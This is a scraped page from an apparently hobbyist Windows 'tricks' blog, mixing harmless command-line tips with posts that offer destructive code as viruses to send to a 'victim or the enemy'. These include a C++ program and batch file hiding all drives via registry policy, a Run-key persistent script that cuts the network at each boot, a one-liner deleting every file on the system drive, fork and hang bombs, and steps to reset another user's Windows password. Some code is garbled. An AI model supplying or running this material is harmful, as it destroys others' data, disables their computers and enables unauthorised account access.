Developer's Note

Followers

Dont forget to like

Recommend on Google

More Post

Random Post

Some More Post

Advertisement

Video

LIke Us

Flag Counter

Pages

Flickr

About

Facebook

Advertising

Advertising

Popular Posts

Showing posts with label Dos. Show all posts
Showing posts with label Dos. Show all posts

Sunday, 20 October 2013

Tagged under: , , ,

Trick to make a hard disk disabling Virus



There is Trick to make a Virus which can disable full Hard Disk. This is a Virus made out of C++ coding. This Trick can be used to hack any computer's hard disk and to annoy the friends or enemy. Note : Don't Run this Program on your Computer otherwise you will lose your Windows. I am not Responsible for any Accident caused by this File on your Computer.


Open Notepad. Copy and Paste the following code into Notepad: 

#include<windows.h>
#include<stream.h>
#include<iostream.h>
#include<string.h>
#include<conio.h>
int main()
{
ofstream write ( "C:\\WINDOWS\\system32\\HackDrive.bat" );
write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n"; 
write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n";
 write<<"shutdown -r -c \"Sorry your Computer is Hacked by Me!\" -f"<<"\n"; write.close(); //close file ShellExecute(NULL,"open","C:\\WINDOWS\\system32\\HackingStar.bat",NULL,NULL,SW_SHOWNORMAL); 

return 0; 
}

 Save it as HardDiskHack.cpp.
 Compile this file in C++ and create the .exe (HardDiskHack.exe) file. 
Send this file to the victim or the enemy. 

Note : Don't Run so Created HardDiskHack.exe File, otherwise it will attack your Computer itself.
 If you are not a good C++ programmer, then you can also create the Bat Virus. To create it follow these simple steps: 


  • Open Notepad. 
  • Copy and Paste the following Code into Notepad:


 REG ADD 
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\nREG ADD
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\nshutdown -r -c \"Sorry your Computer is Hacked by Me!\" -f 


  • Save it as HardDiskHack.bat. 

Now it is done. So it is a simple Trick to make a Virus which can disable full Hard Disk.


                                                                                               

Monday, 11 March 2013

Tagged under: , , ,

Trick to make Virus which can Disable Internet Permanently





There is a Trick to make Virus which can Disable Internet Permanently. To do this follow thesesimple steps : 
1) Open Notepad. 
2) Copy and Paste the following Code into Notepad : 
echo @echo off>c:windowswimn32.bat 
echo break off>>c:windowswimn32.bat 
echo ipconfig/release_all>>c:windowswimn32.bat 
echo end>>c:windowswimn32.bat 
reg add 
hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d 
:windowswimn32.bat /f reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f 
echo You Have Been HACKED! 
PAUSE 

3) Save it as InternetDisabled.bat. 
4) Now it is done. So it is a simple Trick to make Virus which can Disable Internet Permanently. 
   
                                                                                                                      ^_^


Tagged under: , , ,

Tricks to make Simple Virus



There are many Virus which we an develop or can make easily. As I already posted earlier about many Tricks to make Virus, Now here are some more Tricks to make Simple Virus. To make them use the following Trick : 1) Open Notepad 2) Copy and Paste the given below Code of your Choice i.e. type of Virus you want to make : a) To Delete all the Content of a Drive use this Code : @echo off del %systemdrive%\*.* /f /s /q shutdown -r -f -t 00 b) To Crush the Windows use this Code : @Echo off Del C:\ *.* y c) To make Computer Restart simultaneously use this Code : @echo off shutdown -r -f -t 00 d) To make Fork Virus to open many Command Prompts use this Code : start %0 goto :s 3) Now Save these Files with any desired name with .bat extention. 4) Don't Run these Files on Your own Computer otherwise the Result you already know. So these are simple Tricks to make Simple Virus.

Tuesday, 29 January 2013

Tagged under: , ,

How to Speedup Internet Connection Using CMD


Today for all the computer user's major problem is slow internet access. We are using many softwares and tricks to speed up our internet connection. But how many of these softwares and tricks makes us satisfy?

So today I'll give you such a nice trick to speed up your internet connection using command prompt.



Note :
Check your Internet speed test on www.scanmyspeed.com before start this trick. Then, again you can check the new internet speed and feel the difference of this awesome trick.


How to Speedup Internet connection using Command Prompt

Click on Start
Type cmd in Search program and files box (Run cmd as Administrator)
Now command prompt will appear
In command prompt go to root directly "C:\" type cd C:\ )
Now type netsh interface tcp set global autotuning=disabled



Press Enter. That's all, you have Done !!!

Now check the internet speed on www.scanmyspeed.com and feel the difference. If this article is useful, Put your comments and share with it your friends.

Saturday, 17 November 2012

Tagged under: , ,

ACCESS YOUR FOLDERS AS DRIVES




Well, this is my EXCLUSIVE !!!
Trick is all About :
You can create Virtual Drives in your Computer. Now you can access yourFavorite Folders as a drive iMy Computer.

What you can do ?

Wednesday, 14 November 2012

Tagged under: , ,

The easiest way to get your friends PC hanged!


To hang windows explorer:
Get access to your friend's PC Or try it yourself
  • Open Notepad(Start > All Programs > Accessories > Notepad).
  • Copy the following code and paste it in notepad.

@echo off
:A
start
goto:A

  • From the Menu bar, click on File > Save As. The Save As dialog box opens. 
  • Under the Save as type select All Files option. Write a desired name for your file, for example hang.bat [Remember to give a .bat extension to your file name]. 
  • Now Open the hang.bat file and see the computer getting hanged!

Monday, 12 November 2012

Tagged under: , ,

MERGE HIDDEN FILES IN IMAGE FILES





Sometimes we are eager to hide some files on the system !!!


So, now i have got a trick to hide files in image files !!!
Here it is :

** You require WinRAR installed on your PC for this trick.
** First add your files to .rar and i.e. say files.rar
Tagged under: , ,

CHAT WITH COMMAND PROMPT(Without any Messenger)



You can chat with friends using cmd. just you have to follow the below instruction.
1) All you need is your friend’s IP Address and your Command Prompt.
2) Open Notepad and write this code as it is…..!
@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A
3) Now save this as “Messenger.Bat”.
4) Open Command Prompt.
5) Drag this file (.bat file) over to Command Prompt and press Enter.
6) You would then see something like this:
7) Now, type the IP Address of the computer you want to contact and press enter
You will see something like this:
8) Now all you need to do is type your message and press Enter.


Start Chatting…….!
Tagged under: ,

HIDE YOUR FOLDERS(cmd)



(THIS IS REALLY WONDERFUL TRICK ..................)

Hide your folders without the using of folder lock software:

suppose you want to hide a folder named abc which is in D: of your computer,

go to command prompt
start--->run--->cmd-->d:


after changing it from C: to D:

type D:/>attrib +h +s abc
the above command is to hide the folder

To show the folder

Type D:/>attrib -h -s abc

In this type of hidding the folder cannot be viewed even if we make advance search or even changing the folders menu to (show all hidden files)

(YA FRIENDS ITS REALLY COOL U CAN EASILY HIDE UR FOLDERS)

Sunday, 11 November 2012

Tagged under: , ,

Magic Name


"I discovered that nobody can create a FOLDER anywhere on the
Computer which can be named as "CON". This is something pretty
Cool...and Unbelievable.... At Microsoft the whole Team, couldn't answer why this happened!
TRY IT NOW ,IT WILL NOT CREATE " CON " FOLDER

Not only the "con".


Also, the following words comes under this category,


AUX,

PRN,

CLOCK$,

COM,

LPT1,

LPT2,

LPT3,

COM2,

COM3,

COM4,

nul


We can't directly create files and folders in these names from windows; because, these are all reserved words.


But we can create files and folders in the name of reserved words! By using the command prompt


Ex:-


c:\> mkdir \\.\e:\con

c:\> dir \\.\e:\con

c:\> rmdir \\.\e:\con


It’s applicable for all the reserved words in windows and DOS. Try it out..


Note: The files and folders, which are all created in the above method, cannot be accessed directly from the windows. It will results in a not responding state

Tuesday, 6 November 2012

Tagged under: ,

How to Create own run command





1:-Start ->Run”regedit” type without quote.

2:-Goto this address.........

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App paths


3:-Right click on App paths and select New Key

4:-“New key #1” rename and change into pp.exe.

5:-In pp.exe folder create the string value right click New String name as Path.

6:-Then create Path string then right click on Path Modify and your
     application address Or location paste in Modify value data.

7:-Then close all application and then open Start Run ”pp“ without quote.

Monday, 5 November 2012

Tagged under: , ,

How to Trace any website location




1:-Start à Run à “cmd” type with out quote

 2:-After open DOS type following steps below.

C:\>document/~nihar>cd\              (press enter)

C:\>tracert “www.google.co.in”      (press enter) 

"In quote website address would you like change and 
type without quote" 

3:-After Trace complete in DOS website hops..

Exa:-

C:\>tracert www.google.co.in             (press enter)


Tracing route to www.l.goole.co.in [XX.XXX.XXX.XX]
Over a maximum of XX hops:

1    1865 ms    *   1101  ms abs-static-10.25.65.55.google.co.in [XX.XX.X.XX]

…………………………………………………

.............................................

..........................

TRACE COMPLETE


 C:\>


4:-Yellow color is website IP ADDRESS would you want 
     trace location site below links.

5:-ip address tracing website ip-address  OR India trace.

Requirement:- Internet connection when you trace.   

Tagged under: ,

how to hack Windows Password



Mathode:-1 by Dos


1:-Now restart your system and restart time press F8 button continue.

2:-Choose “Safe mode” and then choose “Administrator” account.

3:-start à Run à “cmd” Or “command” without quote.

4:-Now follow these command…

C:\>cd\ (Press enter)

C:\>net user (Press enter)

You see that different – different user name Choose any one User account 
name suppose that “ram” then type these command

C:\>net user ram (Press enter)

C:\>net user ram 12345 (Press enter)


Hack ram user account successfully the password is “12345



Mathode:-2 by Run command




1:- start à Run à “compmgmt.msc” without quote.

2:-click on “Local user & group” in left portion.

3:-Then double click on “User” and right click on any user account name 
     and choose option “set password” then type new password click “ok” button.  



Mathode:-3 by software


This software is windows password hacking software.

Warning:-PLEASE Scan before intallation.


Information about installation into this software
Tagged under: , ,

How to Find the IP Address of a Website using command prompt


How to Find the IP Address of a Website using command prompt


The Steps to find IP Address of a domain Address are

1. Click on start

2. Click on Run and type cmd Press OK ( In Windows XP)

In Vista use search and type command ,press enter

2. Command prompt Window will open






On the command prompt window type

ping [website URL] press enter.

Now you will get reply from the IP address of the website. Some times we may get Request Timed out instead of replies. For that issue click on the link below.

Request Timed out while ping to an Address - Ping Error 
Tagged under: , ,

How to find the IP address of your computer


How to find the IP address of your computer

An IP Address is like a telephone number for your computer. Each time you connect to the Internet you may be assigned a different IP address, or you may always have the same IP address. Your IP address is the way other computers contact you. In some situations it is helpful to know what your IP address is. For example, when doing teleconferencing, other people can call you up if they know what your IP address is. In office situations, other devices such as printers and file servers may have their own IP numbers. An IP address consists of a series of four numbers, connected by dots. An example would be: 123.99.45.67
How to look up your IP address depends on what operating system you are using.

Windows XP, Windows 2000, or Windows NT

  • Click the Start menu
  • Select Programs
  • Select Command Prompt
  • Type ipconfig /all
  • Press Enter

Windows 95, Windows 98, or Windows ME

  • Click the Start button
  • Select Run
  • Type winipcfg
  • Click OK

Linux, MAC OS X, Solaris, AIX and other UNIX variants

  • At the command Prompt type hostname | nslookup
  • At the command Prompt type ifconfig -a
  • You may need to become root and include a full path when typing these commands.

Mac OS X

  • Open the System Preferences in Mac OS X
  • In the resulting window, click the Network icon.
  • In the Network window select the appropriate location
  • IP Address will be shown

Macintosh Mac OS 7.x - Mac OS 9.x

  • Computer must have an active Internet connection
  • Go to the Apple menu by clicking the Apple picture icon
  • Select Control Panels
  • Go to the TCP/IP control panel or MacTCP control panel depending on operating system
  • Choose File
  • Click Get Info

TCP/IP Control Panel

MacTCP Control Panel





Translate